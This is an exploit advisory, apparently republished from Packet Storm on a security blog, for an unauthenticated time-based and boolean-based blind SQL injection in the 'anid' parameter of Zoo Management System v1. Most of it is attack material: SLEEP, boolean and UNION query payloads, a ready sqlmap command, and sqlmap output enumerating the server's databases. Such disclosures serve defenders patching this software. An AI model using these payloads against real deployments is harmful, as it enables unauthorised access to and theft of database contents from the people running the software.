Zoo Management System 1 SQL Injection ≈ Packet Storm – Digitalmunition

Exploit/Advisories no-image-featured-image.png

Published on February 4th, 2021 📆 | 2956 Views ⚑


Zoo Management System 1 SQL Injection ≈ Packet Storm

[*]# Exploit Title: Zoo Management System v1 unauthenticated time &[*]boolean based Blind SQL Injection[*]# Google Dork: N/A[*]# Date: 29/1/2021[*]# Exploit Author: Zeyad Azima[*]# Vendor Homepage: https://phpgurukul.com/[*]# Software Link:[*]https://phpgurukul.com/zoo-management-system-using-php-and-mysql/[*]# Version: V1[*]# Tested on: Windows[*]# CVE : N/A

# Identify the vulnerability

1- go to http://localhost/animals.php and click on an animal

2- then add the following payload to the url

payload: anid=9′ AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND ‘jMXh’=’jMXh[*]url: http://localhost/animal-detail.php?anid=1%20anid=9%27%20AND%20(SELECT%208432%20FROM%20(SELECT(SLEEP(5)))lMym)%20AND%20%27jMXh%27=%27jMXh

If the web server makes you wait 5 seconds then it’s vulnerable

# Exploit

Now you can exploit it using sqlmap

command: sqlmap -u url –dbs

example: sqlmap -u http://localhost/zms/animal-detail.php?anid=1 –dbs[*]___[*]__H__[*]___ ___[.]_____ ___ ___ {}[*]|_ -| . [.] | .’| . |[*]|___|_ [)]_|_|_|__,| _|[*]|_|V… |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without[*]prior mutual consent is illegal. It is the end user’s responsibility[*]to obey all applicable local, state and federal laws. Developers[*]assume no liability and are not responsible for any misuse or damage[*]caused by this program

[*] starting @ 23:05:33 /2021-01-29/

[23:05:34] [INFO] resuming back-end DBMS ‘mysql'[*][23:05:34] [INFO] testing connection to the target URL[*]you have not declared cookie(s), while server wants to set its own[*](‘PHPSESSID=ban6c541hos…n856fi447q’). Do you want to use those [Y/n][*]y[*]sqlmap resumed the following injection point(s) from stored session:[*]—[*]Parameter: anid (GET)[*]Type: boolean-based blind[*]Title: AND boolean-based blind – WHERE or HAVING clause[*]Payload: anid=9′ AND 1925=1925 AND ‘JrZo’=’JrZo

Type: time-based blind[*]Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)[*]Payload: anid=9′ AND (SELECT 8432 FROM (SELECT(SLEEP(5)))lMym) AND[*]’jMXh’=’jMXh

Type: UNION query[*]Title: Generic UNION query (NULL) – 8 columns[*]Payload: anid=9′ UNION ALL SELECT[*]NULL,NULL,NULL,CONCAT(0x716b6b6271,0x5262686e75537a58716e565153775775796b547a4c56616b42647045536274444c6f6b585a654476,0x716a627171),NULL,NULL,NULL,NULL–[*]-[*]—[*][23:05:36] [INFO] the back-end DBMS is MySQL[*]web application technology: Apache 2.4.41, PHP 7.3.10, PHP[*]back-end DBMS: MySQL >= 5.0.12[*][23:05:36] [INFO] fetching database names[*]available databases [6]:[*][*] information_schema[*][*] mysql[*][*] performance_schema[*][*] sys[*][*] umspsdb[*][*] zmsdb

[23:05:36] [INFO] fetched data logged to text files under[*]

Source link

Tagged with:

Leave a Reply